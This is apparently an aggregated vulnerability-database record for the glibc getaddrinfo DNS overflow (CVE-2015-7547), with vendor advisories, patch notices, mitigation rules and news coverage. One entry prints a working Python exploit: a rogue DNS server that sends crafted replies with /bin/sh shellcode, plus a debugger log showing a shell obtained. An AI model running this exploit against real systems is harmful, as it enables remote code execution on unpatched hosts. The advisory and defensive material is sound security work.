whether to resolve the DNS name to an IPv4 or IPv6 address, so the resolver sends both type A (IPv4) and AAAA (IPv6) DNS queries in parallel. A mismanagement of the buffers allocated for the queries may cause an oversized response of a DNS query to be written beyond the bounds of the query's buffer.\n\nA remote attacker can exploit this vulnerability by sending a crafted, oversized DNS response to the DNS resolver. The resolver will crash or execute arbitrary code with the access privileges of the application requesting the DNS name resolution. If the application runs with root privileges, the remote attacker will gain root access and have complete control of the target.\n\n**CVE-2015-7547** \n--- \n**Severity / CVSSv2** | High / 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n**References** | SecurityFocus: [BID 83265](<https://www.securityfocus.com/bid/83265>) / NVD: [CVE-2015-7547](<https://nvd.nist.gov/vuln/detail/CVE-2015-7547>) \n**Impact** | Denial of service, code execution \n**Description** | A stack-based buffer overflow in the client DNS resolver allows a remote attacker to send a crafted DNS response and cause cause an application crash or execute arbitrary code. \n \n### MITIGATION\n\n \n\n\nBlue Coat's ProxySG appliance can be used to protect against the glibc remote code execution attack. Customers using ProxySG as a reverse proxy can protect network hosts by blocking the oversized DNS responses that trigger the stack-based buffer overflow. DNS responses over TCP should be limited to 1024 bytes and DNS responses over UDP should be limited to 512 bytes. ProxySG 6.5 and 6.6 customers can use the following CPL syntax:\n \n \n <dns-proxy>\n dns.request.threat_risk.level=7.. dns.respond(refused)\n \n <dns-proxy> dns.client_transport=tcp\n dns.response.cname.length=1024.. dns.respond(refused)\n dns.response.ptr.length=1024.. dns.respond(refused)\n \n <dns-proxy> dns.client_transport=udp\n dns.response.cname.length=512.. dns.respond(refused)\n dns.response.ptr.length=512.. dns.respond(refused)\n \n\n### REFERENCES\n\n \n\n\nGoogle Security Team announcement and analysis - <https://security.googleblog.com/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html>\n\n### REVISION\n\n \n\n\n2017-02-07 MC 1.8 is not vulnerable. Vulnerability inquiries for DLP should be addressed to Digital Guardian technical support. SA status moved to Final. \n2016-12-04 SSLV 3.11 is not vulnerable. PacketShaper S-Series 11.7 is not vulnerable. \n2016-11-17 Cloud Data Protection for Oracle Field Service Cloud is not vulnerable. \n2016-11-11 SSLV 3.10 is not vulnerable. \n2016-10-26 MC 1.6 and 1.7 are not vulnerable. \n2016-09-01 A fix for SSLV 3.8.4FC is available in 3.8.4FC-55. \n2016-08-12 Security Analytics 7.2 is not vulnerable. \n2016-07-16 A fix for XOS 10.0 is available in 10.0.6. A fix for XOS 11.0 is available in 11.0.2. \n2016-06-30 PacketShaper S-Series 11.6 is not vulnerable. \n2016-06-27 Fixes will not be provided for PacketShaper S-Series 11.2, 11.3, and 11.4. Please upgrade to a later version with the vulnerability fixes. \n2016-06-23 A fix for ASG is available in 6.6.4.1. \n2016-06-14 A fix for SA 7.0 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2016-06-13 Fixes for ICSP, NNP, and NSP are available in 5.3.6. \n2016-05-19 Fixes are available in Security Analytics 6.6.12 and 7.1.11. \n2016-05-11 No Cloud Data Protection products are vulnerable. \n2016-04-28 A fix for PacketShaper S-Series 11.5 is available in 11.5.3.1. A fix for PolicyCenter S-Series is available in 1.1.2.1. \n2016-04-24 Mail Transfer Defense is not vulnerable. \n2016-04-15 A fix will not be provided for CAS 1.2. Please upgrade to a later version with the vulnerability fixes. \n2016-04-01 A fix for Reporter 10.1 is available in 10.1.4.1. \n2016-03-23 XOS 9.7 is not vulnerable. \n2016-03-17 A fix for SSLV 3.8 is available in 3.8.6-14. \n2016-03-14 Fixes are available for CAS 1.3 in 1.3.6.1 and for MC 1.5 in 1.5.3.1. \n2016-03-10 A fix for MAA 4.2 is available in 4.2.8 \n2016-03-04 A fix for SSLV 3.9 is available in 3.9.3.3. \n2016-02-29 Added CVSS v2 score \n2016-02-19 initial public release\n", "modified": "2017-02-07T07:00:00", "published": "2016-02-19T07:00:00", "id": "SMNTC-1348", "href": "", "type": "symantec", "title": "SA114 : GNU C Library (glibc) Remote Code Execution February 2016", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:34:58", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "It was discovered that the GNU C Library incorrectly handled receiving \nresponses while performing DNS resolution. A remote attacker could use this \nissue to cause the GNU C Library to crash, resulting in a denial of \nservice, or possibly execute arbitrary code.", "edition": 5, "modified": "2016-02-16T00:00:00", "published": "2016-02-16T00:00:00", "id": "USN-2900-1", "href": "https://ubuntu.com/security/notices/USN-2900-1", "title": "GNU C Library vulnerability", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:05:49", "description": "\nglibc - getaddrinfo Remote Stack Buffer Overflow", "edition": 1, "published": "2016-09-06T00:00:00", "title": "glibc - getaddrinfo Remote Stack Buffer Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7547"], "modified": "2016-09-06T00:00:00", "id": "EXPLOITPACK:F166ACAD2E7FB4051F3FE1B40BED2A86", "href": "", "sourceData": "/*\n\nadd by SpeeDr00t@Blackfalcon (jang kyoung chip)\n\nThis is a published vulnerability by google in the past.\nPlease refer to the link below.\n \nReference: \n- https://googleonlinesecurity.blogspot.kr/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html\n- https://github.com/fjserna/CVE-2015-7547\n- CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow \n\nWhen Google announced about this code(vulnerability), \nit was missing information on shellcode.\nSo, I tried to completed the shellcode.\nIn the future, I hope to help your study.\n \n\n(gdb) r\nStarting program: /home/haker/client1 \nGot object file from memory but can't read symbols: File truncated.\n[UDP] Total Data len recv 36\n[UDP] Total Data len recv 36\nudp send \nsendto 1 \nTCP Connected with 127.0.0.1:60259\n[TCP] Total Data len recv 76\n[TCP] Request1 len recv 36\ndata1 = \u00ef\u00bf\u00bd\u00ef\u00bf\u00bd\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u0001\u0001\nquery = \u0003foo\u0003bar\u0006google\u0003com\u0001\u0001$(\u00ef\u00bf\u00bd\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u001c\u0001\n[TCP] Request2 len recv 36\nsendto 2 \ndata1_reply\ndata2_reply\n[UDP] Total Data len recv 36\n[UDP] Total Data len recv 36\nudp send \nsendto 1 \nTCP Connected with 127.0.0.1:60260\n[TCP] Total Data len recv 76\n[TCP] Request1 len recv 36\ndata1 = \u00ef\u00bf\u00bd\u00ef\u00bf\u00bd\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u0001\u0001\nquery = \u0003foo\u0003bar\u0006google\u0003com\u0001\u0001$\u00ef\u00bf\u00bd7\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u001c\u0001\n[TCP] Request2 len recv 36\nsendto 2 \ndata1_reply\ndata2_reply\nprocess 6415 is executing new program: /bin/dash\n$ id\nuid=1000(haker) gid=1000(haker) groups=1000(haker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)\n$ \n\n*/\n\n\n\n\nimport socket\nimport time\nimport struct\nimport threading\n\nIP = '192.168.111.5' # Insert your ip for bind() here...\nANSWERS1 = 184\n\nterminate = False\nlast_reply = None\nreply_now = threading.Event()\n\n\ndef dw(x):\n return struct.pack('>H', x)\n\ndef dd(x):\n return struct.pack('>I', x)\n\ndef dl(x):\n return struct.pack('<Q', x)\n\ndef db(x):\n return chr(x)\n\ndef udp_thread():\n global terminate\n\n # Handle UDP requests\n sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock_udp.bind((IP, 53))\n\n reply_counter = 0\n counter = -1\n\n answers = []\n\n while not terminate:\n data, addr = sock_udp.recvfrom(1024)\n print '[UDP] Total Data len recv ' + str(len(data))\n id_udp = struct.unpack('>H', data[0:2])[0]\n query_udp = data[12:]\n\n # Send truncated flag... so it retries over TCP\n data = dw(id_udp) # id\n data += dw(0x8380) # flags with truncated set\n data += dw(1) # questions\n data += dw(0) # answers\n data += dw(0) # authoritative\n data += dw(0) # additional\n data += query_udp # question\n data += '\\x00' * 2500 # Need a long DNS response to force malloc \n\n answers.append((data, addr))\n\n if len(answers) != 2:\n continue\n\n counter += 1\n\n if counter % 4 == 2:\n answers = answers[::-1]\n\n\n print 'udp send '\n time.sleep(0.01)\n sock_udp.sendto(*answers.pop(0))\n\n print 'sendto 1 '\n reply_now.wait()\n sock_udp.sendto(*answers.pop(0))\n print 'sendto 2 '\n\n sock_udp.close()\n\n\ndef tcp_thread():\n global terminate\n counter = -1\n\n #Open TCP socket\n sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock_tcp.bind((IP, 53))\n sock_tcp.listen(10)\n\n print 'a'\n\t\n while not terminate:\n conn, addr = sock_tcp.accept()\n counter += 1\n print 'TCP Connected with ' + addr[0] + ':' + str(addr[1])\n\n # Read entire packet\n data = conn.recv(1024)\n print '[TCP] Total Data len recv ' + str(len(data))\n\n reqlen1 = socket.ntohs(struct.unpack('H', data[0:2])[0])\n print '[TCP] Request1 len recv ' + str(reqlen1)\n data1 = data[2:2+reqlen1]\n\n print 'data1 = ' +data1\n\n id1 = struct.unpack('>H', data1[0:2])[0]\n query1 = data[12:]\n\n print 'query = ' + query1\n\n # Do we have an extra request?\n data2 = None\n if len(data) > 2+reqlen1:\n reqlen2 = socket.ntohs(struct.unpack('H', data[2+reqlen1:2+reqlen1+2])[0])\n print '[TCP] Request2 len recv ' + str(reqlen2)\n data2 = data[2+reqlen1+2:2+reqlen1+2+reqlen2]\n id2 = struct.unpack('>H', data2[0:2])[0]\n query2 = data2[12:]\n\n\n\n # Reply them on different packets\n data = ''\n data += dw(id1) # id\n data += dw(0x8180) # flags\n data += dw(1) # questions\n data += dw(ANSWERS1) # answers\n data += dw(0) # authoritative\n data += dw(0) # additional\n data += query1 # question\n\n\n\n for i in range(ANSWERS1):\n answer = dw(0xc00c) # name compressed\n answer += dw(1) # type A\n answer += dw(1) # class\n answer += dd(13) # ttl\n answer += dw(4) # data length\n answer += 'D' * 4 # data\n\n data += answer\n\n data1_reply = dw(len(data)) + data\n\n if data2:\n data = ''\n data += dw(id2)\n data += 'A' * (6)\n data += '\\x08\\xc5\\xff\\xff\\xff\\x7f\\x00\\x00'\n data += '\\x90' * (44)\n data += '\\x90' * (1955)\n data += '\\x48\\x31\\xff\\x57\\x57\\x5e\\x5a\\x48\\xbf\\x2f\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x48\\xc1\\xef\\x08\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x0f\\x05'\n data += '\\x90' * (100)\n data += '\\xc0\\xc4\\xff\\xff\\xff\\x7f\\x00\\x00'\n data += 'F' * (8)\n data += '\\xc0\\xc4\\xff\\xff\\xff\\x7f\\x00\\x00'\n data += 'G' * (134)\n data2_reply = dw(len(data)) + data\n else:\n data2_reply = None\n\n reply_now.set()\n time.sleep(0.01)\n conn.sendall(data1_reply)\n print 'data1_reply'\n time.sleep(0.01)\n if data2:\n conn.sendall(data2_reply)\n print 'data2_reply'\n\n reply_now.clear()\n\n sock_tcp.shutdown(socket.SHUT_RDWR)\n sock_tcp.close()\n\n\nif __name__ == \"__main__\":\n\n t = threading.Thread(target=udp_thread)\n t.daemon = True\n t.start()\n tcp_thread()\n terminate = True", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:05:49", "description": "\nglibc - getaddrinfo Stack Buffer Overflow (PoC)", "edition": 1, "published": "2016-02-16T00:00:00", "title": "glibc - getaddrinfo Stack Buffer Overflow (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7547"], "modified": "2016-02-16T00:00:00", "id": "EXPLOITPACK:DD5C62A73445C642253B1991DCB09412", "href": "", "sourceData": "Sources: \nhttps://googleonlinesecurity.blogspot.sg/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html\nhttps://github.com/fjserna/CVE-2015-7547\n\nTechnical information:\n\nglibc reserves 2048 bytes in the stack through alloca() for the DNS answer at _nss_dns_gethostbyname4_r() for hosting responses to a DNS query.\n\nLater on, at send_dg() and send_vc(), if the response is larger than 2048 bytes, a new buffer is allocated from the heap and all the information (buffer pointer, new buffer size and response size) is updated.\n\nUnder certain conditions a mismatch between the stack buffer and the new heap allocation will happen. The final effect is that the stack buffer will be used to store the DNS response, even though the response is larger than the stack buffer and a heap buffer was allocated. This behavior leads to the stack buffer overflow.\n\nThe vectors to trigger this buffer overflow are very common and can include ssh, sudo, and curl. We are confident that the exploitation vectors are diverse and widespread; we have not attempted to enumerate these vectors further.\n\nWe are providing this code as-is. You are responsible for protecting yourself,\nyour property and data, and others from any risks caused by this code. This\ncode may cause unexpected and undesirable behavior to occur on your machine.\nThis code may not detect the vulnerability on your system.\n\nNote that this POC consists of two components: server code and client code.\nThe server code triggers the vulnerability and therefore will crash the client\ncode. Note also that it is necessary to set the nameserver to point to the\nserver code, and doing so could cause other programs that call into the\ngetaddrinfo() function to crash while testing is underway. This POC code is\nprovided \"as is\" with no warranties, whether express or implied, including\nwithout limitation any warranties or merchantability, fitness for a particular\nuse and noninfringement. Google assumes no responsibility for your proper\ninstallation and use of the POC code.\n\n\nProof of Concept:\nhttps://github.com/fjserna/CVE-2015-7547/archive/master.zip\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39454-1.zip", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2020-10-25T16:36:37", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "New glibc packages are available for Slackware 14.1 and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/glibc-2.17-i486-11_slack14.1.txz: Rebuilt.\n This update provides a patch to fix the stack-based buffer overflow in\n libresolv that could allow specially crafted DNS responses to seize\n control of execution flow in the DNS client (CVE-2015-7547). However,\n due to a patch applied to Slackware's glibc back in 2009 (don't use the\n gethostbyname4() lookup method as it was causing some cheap routers to\n misbehave), we were not vulnerable to that issue. Nevertheless it seems\n prudent to patch the overflows anyway even if we're not currently using\n the code in question. Thanks to mancha for the backported patch.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547\n (* Security fix *)\npatches/packages/glibc-i18n-2.17-i486-11_slack14.1.txz: Rebuilt.\npatches/packages/glibc-profile-2.17-i486-11_slack14.1.txz: Rebuilt.\npatches/packages/glibc-solibs-2.17-i486-11_slack14.1.txz: Rebuilt.\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/glibc-2.17-i486-11_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/glibc-i18n-2.17-i486-11_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/glibc-profile-2.17-i486-11_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/glibc-solibs-2.17-i486-11_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/glibc-2.17-x86_64-11_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/glibc-i18n-2.17-x86_64-11_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/glibc-profile-2.17-x86_64-11_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/glibc-solibs-2.17-x86_64-11_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/glibc-solibs-2.23-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-2.23-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-i18n-2.23-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-profile-2.23-i586-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/glibc-solibs-2.23-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-2.23-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-i18n-2.23-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-profile-2.23-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.1 packages:\n4c56432d638adc8098661cfa818b5bc9 glibc-2.17-i486-11_slack14.1.txz\n5c316d6b0a8970fe15fbdf2adff8de19 glibc-i18n-2.17-i486-11_slack14.1.txz\na937d842e5ca3d0b125230c23285f8f4 glibc-profile-2.17-i486-11_slack14.1.txz\n442f01d094d350612c1fb1fcb5e7fbe7 glibc-solibs-2.17-i486-11_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\neec88d584a79909ec79aae1c43c330d3 glibc-2.17-x86_64-11_slack14.1.txz\nd8b396eb6ada65d1555e3cf0fb8246c2 glibc-i18n-2.17-x86_64-11_slack14.1.txz\ne7deaabfe3e467cbde10ba5b7748bbbb glibc-profile-2.17-x86_64-11_slack14.1.txz\n629c93f0e510d354ff66e61f1ebe8b67 glibc-solibs-2.17-x86_64-11_slack14.1.txz\n\nSlackware -current packages:\nb11873e4f851a600b57a2e7a2ac8f472 a/glibc-solibs-2.23-i586-1.txz\n5116eec63fab5e7dbc58d27fecd48684 l/glibc-2.23-i586-1.txz\nae9b8a8e4ead59aa398212d6893d7ddc l/glibc-i18n-2.23-i586-1.txz\n61154e43ee4c0739dd5d3c4ce3b60ae6 l/glibc-profile-2.23-i586-1.txz\n\nSlackware x86_64 -current packages:\nc48a55c8a39dc8e17e04796e4f160bd0 a/glibc-solibs-2.23-x86_64-1.txz\n36104e1a004b0e97d193c2132f18222d l/glibc-2.23-x86_64-1.txz\ne0415f66d17323c8f6df339cfd49051b l/glibc-i18n-2.23-x86_64-1.txz\nf5433793e9da696a60f2445559f1d33f l/glibc-profile-2.23-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg glibc-*.txz", "modified": "2016-02-23T19:50:50", "published": "2016-02-23T19:50:50", "id": "SSA-2016-054-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.569827", "type": "slackware", "title": "[slackware-security] glibc", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T22:55:46", "bulletinFamily": "info", "cvelist": ["CVE-2015-7547"], "description": "Not since Stagefright have we had a vulnerability with the scale and reach of the [glibc flaw](<https://threatpost.com/critical-glibc-vulnerability-puts-all-linux-machines-at-risk/116261/>) disclosed on Tuesday.\n\n\u201cIt\u2019s pretty bad; you don\u2019t get bugs of this magnitude too often,\u201d said Dan Kaminsky, researcher, cofounder and chief scientist at White Ops. \u201cThe code path is widely exposed and available, and it yields remote code execution.\u201d\n\nThe flaw affects most Linux servers, along with a number of web frameworks and services that make use of the open source GNU C library, including ssh, sudo, curl, PHP, Rails and others. Initial reports about the impact on Android were incorrect given that the OS uses the Bionic libc implementation and not glibc.\n\nThe harshness of the bug, a stack-based buffer overflow, rests in the fact that it lives in the glibc DNS client-side resolver, or libresolv library. Since DNS is a core network technology and most services rely on it, the horizontal scale of this bug is massive.\n\n\u201cAn attack would first force a system to make specific DNS queries, using domain names controlled by the attacker. The attacker would then have to run custom-written DNS server software, which generates crafted responses that trigger the vulnerability,\u201d Red Hat engineer Florian Weimer told Threatpost. It\u2019s believed that the most direct exploitation vector would be a man-in-the-middle attack where an attacker would already be on the local network. \u201cWe do not know how difficult it is to exploit this over the Internet. We assume this is a possibility,\u201d Weimer said, adding that he was not aware of any public exploits.\n\nKaminsky added that while man-in-the-middle attacks are problematic, it would be much worse if the flaw were exploitable through DNS caching-only servers.\n\n\u201cThese servers do some scrubbing to make sure the name that comes back meets a bunch of rules. It dramatically reduces the exploitability of many flaws,\u201d Kaminsky said. \u201cThe researchers are being cagey, but if they accidentally found the bug through the caching name server, in that case, it could just cause a server to look up an arbitrary name. This would be substantially worse if it went through the caching ecosystem; 99 percent of attack vectors go through that system.\u201d\n\nCarlos O\u2019Donnell of Red Hat wouldn\u2019t commit to that scenario yesterday in an [advisory](<https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html>).\n\n\u201cA back of the envelope analysis shows that it should be possible to write correctly formed DNS responses with attacker controlled payloads that will penetrate a DNS cache hierarchy and therefore allow attackers to exploit machines behind such caches,\u201d he wrote.\n\nAdding to the severity of the issue is the fact that the vulnerability was introduced in glibc 2.9, which dates back to May 2008, giving attackers close to eight years to find and abuse the bug.\n\n\u201cWe know as fact that multiple research groups found this and successfully coordinated work to fix it, which is very good,\u201d Kaminsky said. \u201cBut we know its been around a decent amount of time, and we know it\u2019s a golden vector that gets into all sorts of goodies. Likely, this has been discovered and exploited in the field.\u201d\n\nThe bug, CVE-2015-7547, was discovered independently by researchers at Red Hat and Google who privately disclosed the issue to upstream glibc maintainers, Weimer told Threatpost. Coordination between the two camps began on Jan. 6, though the initial bug disclosure was made last July, according to an [advisory](<https://sourceware.org/bugzilla/show_bug.cgi?id=18665>) on the glibc mailing list.\n\nWeimer said that most Linux distributions that use glibc have patches available and a regular system upgrade followed by a reboot will address the issue. Source code patches for those who have their own software builds are also available.\n\n\u201cMost GNU/Linux distributions release glibc updates multiple times per year,\u201d Weimer said. \u201cThese updates include not just security fixes, but also other bug fixes and performance enhancements. Fixes for glibc may be bundled with Linux kernel updates, making it beneficial to update both at the same time before a reboot.\u201d\n\nGoogle\u2019s Fermin Serna said there are temporary mitigations that can be implemented until Linux machines can be patched, including limiting the size of a UDP or TCP response accepted by a DNS resolver, and to ensure that DNS queries are sent only to servers that limit the response size. Kaminsky, however, said that most network admins would be unlikely to implement those mitigations for fear of breaking other services.\n\n\u201cThey\u2019re still finding bugs of this magnitude accidentally,\u201d Kaminsky said. \u201cUsing ambient bug discovery on core infrastructure is too slow. This was written in 2008 and it sat there year after year. We need to stop accidentally finding these bugs and start comprehensively finding them.\u201d\n\nKamsinsky added that more comprehensive mitigations need to be deployed and enforced.\n\n\u201cWe need to figure out how to reach a higher level of assurance on low-performance, high-risk code paths,\u201d he said.\n", "modified": "2016-02-17T21:01:47", "published": "2016-02-17T16:01:47", "id": "THREATPOST:85ADF3548849401007E4326098F0A726", "href": "https://threatpost.com/magnitude-of-glibc-vulnerability-coming-to-light/116296/", "type": "threatpost", "title": "Magnitude of glibc Vulnerability Coming to Light", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T22:55:47", "bulletinFamily": "info", "cvelist": ["CVE-2015-7547"], "description": "Glibc, the GNU C library at the core of last year\u2019s [GHOST vulnerability](<https://threatpost.com/ghost-glibc-remote-code-execution-vulnerability-affects-all-linux-systems/110679/>), is vulnerable to another critical flaw affecting nearly all Linux machines, as well as API web services and major web frameworks where the code runs.\n\nThe vulnerability, discovered independently by researchers at Google and Red Hat, has been [patched](<https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html>).\n\nThe flaw, CVE-2015-7547, is a stack-based buffer overflow in the glibc DNS client-side resolver that puts Linux machines at risk for remote code execution. The flaw is triggered when the getaddrinfo() library function is used, Google said today in its [advisory](<https://googleonlinesecurity.blogspot.com/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html>).\n\n\u201cOverflowing bytes are entirely under the control of the attacker and are the result of a crafted DNS response,\u201d said a separate [advisory](<https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html>) posted by Carlos O\u2019Donnell of Red Hat. O\u2019Donnell and Florian Weimer of Red Hat worked on the patch along with Google researcher Fermin J. Serna.\n\n\u201cA back of the envelope analysis shows that it should be possible to write correctly formed DNS responses with attacker controlled payloads that will penetrate a DNS cache hierarchy and therefore allow attackers to exploit machines behind such caches,\u201d O\u2019Donnell said. It\u2019s likely that all Linux servers and web frameworks such as Rails, PHP and Python are affected, as well as Android apps running glibc.\n\nThe bug was reported to the glibc maintainers last July, but was apparently introduced in glibc 2.9 in May 2008. O\u2019Donnell said in the advisory that the vulnerability has likely not been publicly attacked.\n\n\u201cLocal testing shows that we have been able to control at least the execution of one free() call with the buffer overflow and gained control of EIP,\u201d O\u2019Donnell said. \u201cFurther exploitation was not attempted, only this single attempt to show that it is very likely that execution control can be gained without much more effort.\u201d\n\nExperts urge admins to patch immediately.\n\n\u201cIt qualifies as an urgent \u2018patch today\u2019 vulnerability,\u201d said Kenneth White, security researcher and director of the Open Crypto Audit Project (OCAP).\n\nGoogle\u2019s Serna confirmed the issue affects all versions of glibc since 2.9 and added that there are temporary mitigations that can be implemented until Linux machines can be patched.\n\n\u201cThe vulnerability relies on an oversized (2048+ bytes) UDP or TCP response, which is followed by another response that will overwrite the stack,\u201d Serna said. \u201cOur suggested mitigation is to limit the response (i.e., via DNSMasq or similar programs) sizes accepted by the DNS resolver locally as well as to ensure that DNS queries are sent only to DNS servers which limit the response size for UDP responses with the truncation bit set.\u201d\n\nGoogle said that a number of exploitation vectors can be used to attack this vulnerability, including but not limited to ssh, sudo and curl.\n\n\u201cRemote code execution is possible, but not straightforward,\u201d Serna said. \u201cIt requires bypassing the security mitigations present on the system, such as ASLR.\u201d\n\nGlibc is the C library that defines systems calls and other basic functions on Linux systems including the GNU OS and GNU Linux.\n", "modified": "2016-02-17T19:35:09", "published": "2016-02-16T12:00:37", "id": "THREATPOST:C83FE8B4B85CD379E535AF0E229EB5D2", "href": "https://threatpost.com/critical-glibc-vulnerability-puts-all-linux-machines-at-risk/116261/", "type": "threatpost", "title": "glibc Linux remote code execution vulnerability", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2016-09-04T11:29:42", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "This update for glibc fixes the following security issues:\n\n * fix stack overflow in the glibc libresolv DNS resolver function\n getaddrinfo(), known as CVE-2015-7547. It is a client side\n networked/remote vulnerability.\n\n", "edition": 1, "modified": "2016-02-19T12:11:39", "published": "2016-02-19T12:11:39", "id": "OPENSUSE-SU-2016:0512-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-02/msg00044.html", "type": "suse", "title": "Security update for glibc (critical)", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:21:19", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "This update for glibc fixes the following security issues:\n\n * fix stack overflow in the glibc libresolv DNS resolver function\n getaddrinfo(), known as CVE-2015-7547. It is a client side\n networked/remote vulnerability.\n\n", "edition": 1, "modified": "2016-02-19T12:11:34", "published": "2016-02-19T12:11:34", "id": "OPENSUSE-SU-2016:0511-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-02/msg00043.html", "type": "suse", "title": "Security update for glibc (critical)", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-09-06T21:28:11", "description": "glibc - getaddrinfo Stack Based Buffer Overflow. CVE-2015-7547. Remote exploit for Linux platform", "published": "2016-09-06T00:00:00", "type": "exploitdb", "title": "glibc - getaddrinfo Stack Based Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7547"], "modified": "2016-09-06T00:00:00", "id": "EDB-ID:40339", "href": "https://www.exploit-db.com/exploits/40339/", "sourceData": "'''\r\nadd by SpeeDr00t@Blackfalcon (jang kyoung chip)\r\n\r\nThis is a published vulnerability by google in the past.\r\nPlease refer to the link below.\r\n \r\nReference: \r\n- https://googleonlinesecurity.blogspot.kr/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html\r\n- https://github.com/fjserna/CVE-2015-7547\r\n- CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow \r\n\r\nWhen Google announced about this code(vulnerability), \r\nit was missing information on shellcode.\r\nSo, I tried to completed the shellcode.\r\nIn the future, I hope to help your study.\r\n \r\n \r\n(gdb) gdb -q client1\r\nUndefined command: \"gdb\". Try \"help\".\r\n(gdb) r\r\nStarting program: /home/haker/client1 \r\nGot object file from memory but can't read symbols: File truncated.\r\n[UDP] Total Data len recv 36\r\n[UDP] Total Data len recv 36\r\nudp send \r\nsendto 1 \r\nTCP Connected with 127.0.0.1:60259\r\n[TCP] Total Data len recv 76\r\n[TCP] Request1 len recv 36\r\ndata1 = \ufffd\ufffd\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u0001\u0001\r\nquery = 